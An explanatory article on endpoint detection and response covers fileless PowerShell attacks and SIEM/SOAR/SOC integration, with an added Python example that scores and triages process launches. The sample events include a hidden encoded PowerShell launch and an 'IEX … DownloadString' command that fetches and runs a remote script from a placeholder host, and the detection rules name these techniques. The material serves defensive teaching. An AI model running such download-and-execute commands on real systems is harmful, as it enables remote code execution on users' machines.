Preventive measures alone are not enough to protect notebooks, desktop computers and smartphones. Additional measures are essential in order to detect and combat sophisticated cyber attacks – like a system for endpoint detection and response.
Text: Andreas Heer, Image: iStock
End devices are often just the start. According to the “Endpoint Security Trends Report” published by the US security provider Absolute Software, around 70 percent of cyber attacks use endpoints as the first point of attack. Endpoints can be notebooks, PCs and smartphones, but also local servers on a company’s network.
The large number of successful attacks demonstrates that purely preventive protection with antivirus software and firewalls is often not enough, because the attacks are becoming increasingly sophisticated. Take fileless attacks: a PowerShell script, for instance, that runs solely in the RAM of a Windows PC without leaving any traces in the file system. That makes such an attack invisible to signature-based antivirus software. And because the actual payload is often downloaded via a compromised website, it also slips right past the firewall.
This means that end devices require additional protective measures that can detect sophisticated attacks – only then can a company introduce measures for combating the attack. An endpoint detection and response (EDR) system is able to do both. In contrast to signature-based antivirus software, it evaluates the behaviour of the end device and can detect anomalies. EDR also uses machine learning to analyse patterns of behaviour, guaranteeing a highly accurate detection rate. The term “EDR” is relatively new, coined by Gartner analyst Anton Chuvakin in 2013.
EDR is not a standalone solution, however. The alerts triggered by anomalies need to be integrated into a monitoring system such as SIEM (security information and event management) or SOAR (security orchestration, automation and response). This makes it possible to respond with appropriate measures such as automatically blocking the end device’s network access or having the event manually analysed by security specialists. These are tasks that are generally performed by a security operations centre (SOC). A SOC is therefore the logical – and practical – prerequisite for effective EDR.
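The three preceding paragraphs describe a chain: a fileless PowerShell launch that a signature scanner cannot see, behavioural scoring of the process that launched it, and a SIEM/SOAR step that either isolates the device automatically or hands the event to an analyst. The following Python block is an added illustration of that chain and is not code from the article or from any EDR product. The event fields, all sample events (including the base64 filler and the example.invalid URL), the rule weights and the severity thresholds are constructed assumptions; real agents report far richer telemetry (PowerShell script block logging, AMSI, module loads), and the regexes here are deliberately simple heuristics on the command line.

```python
"""Behaviour-based scoring of PowerShell launches plus a SOAR-style triage step.

Added example for illustration only: field names, sample events, weights and
thresholds are constructed assumptions, not any vendor's rule set.
"""
import re
from dataclasses import dataclass
from typing import Callable, NamedTuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record as an EDR agent might report it (assumed schema)."""
    host: str
    user: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the newly created process
    command_line: str


class Rule(NamedTuple):
    name: str
    weight: int
    matches: Callable[[ProcessEvent], bool]


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _cmd_has(pattern: str) -> Callable[[ProcessEvent], bool]:
    """Build a predicate that tests the command line against a case-insensitive regex."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda e: rx.search(e.command_line) is not None


# Behavioural indicators: none is a file hash or signature; each describes
# *how* the script host was launched, which is what survives a fileless attack.
RULES = [
    Rule("office_app_spawns_script_host", 40,
         lambda e: _basename(e.parent_image) in OFFICE_APPS
         and _basename(e.image) in SCRIPT_HOSTS),
    # -e / -ec / -enc / -encodedcommand followed by a base64 blob
    Rule("encoded_command", 25,
         _cmd_has(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}")),
    # script text fetched and executed without touching disk
    Rule("download_and_invoke_in_memory", 30,
         _cmd_has(r"downloadstring|invoke-expression|(?:^|[\s(\"'])iex\b")),
    Rule("hidden_window", 10, _cmd_has(r"-w(?:in[a-z]*)?\s+hidden")),
    Rule("execution_policy_bypass", 10, _cmd_has(r"-ex[a-z]*\s+bypass")),
    Rule("no_profile", 5, _cmd_has(r"-nop(?:rofile)?\b")),
]

HIGH, MEDIUM = 60, 30   # assumed severity thresholds


def evaluate(event: ProcessEvent) -> dict:
    """Score one event and return a SIEM-ready alert record.

    Only script-host launches are scored; 'low' severity means nothing is forwarded.
    """
    hits = []
    if _basename(event.image) in SCRIPT_HOSTS:
        hits = [r.name for r in RULES if r.matches(event)]
    score = sum(r.weight for r in RULES if r.name in hits)
    severity = "high" if score >= HIGH else "medium" if score >= MEDIUM else "low"
    return {"host": event.host, "user": event.user, "command_line": event.command_line,
            "score": score, "indicators": hits, "severity": severity}


def triage(alert: dict) -> str:
    """SOAR-style playbook step choosing the response for an alert.

    high   -> automatically block the device's network access
    medium -> hand to a SOC analyst for manual investigation
    low    -> keep for correlation only
    """
    return {"high": "isolate_host", "medium": "escalate_to_analyst"}.get(
        alert["severity"], "log_only")


def run(events) -> list[dict]:
    """Evaluate a batch of events and return only the alerts that need a response."""
    out = []
    for ev in events:
        alert = evaluate(ev)
        if alert["severity"] != "low":
            alert["action"] = triage(alert)
            out.append(alert)
    return out


# Constructed sample telemetry (hostnames, users, paths and URL are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent("ws-0142", "CORP\\a.muster",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
                 "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),      # constructed base64 filler
    ProcessEvent("ws-0142", "CORP\\a.muster",
                 r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-ChildItem C:\\Users\\a.muster\\Documents"),   # benign
    ProcessEvent("srv-db01", "CORP\\svc_backup",
                 r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh.exe -ExecutionPolicy Bypass -Command \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/update.ps1')\""),
]


if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(f"{a['host']:8} {a['severity']:6} score={a['score']:3} "
              f"{a['action']:20} {', '.join(a['indicators'])}")
```

Run as a script, the first sample (Word spawning a hidden, encoded PowerShell) scores 80 and is routed to automatic isolation, the benign directory listing produces no alert, and the in-memory download from cmd.exe scores 40 and goes to an analyst. The point is the division of labour the article describes: the scoring is what an EDR agent contributes, the thresholds and the `triage` playbook live in the SIEM/SOAR layer, and the "escalate" branch only works if a SOC is actually staffed to receive it.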
This requires an EDR solution to be integrated into the existing processes and security systems. Depending on the existing infrastructure, this could be a challenging proposition, for example when it comes to adapting the automated response measures. The available resources of the internal IT security department pose another challenge. Are there sufficient resources available to manage larger attacks?
Completely foregoing EDR is not a viable alternative. Instead, the combination of EDR and SOC as a service offers an economic and, above all, practicable alternative for counteracting cost uncertainty and the lack of skilled workers – without jeopardising the maturity expected of IT security systems today.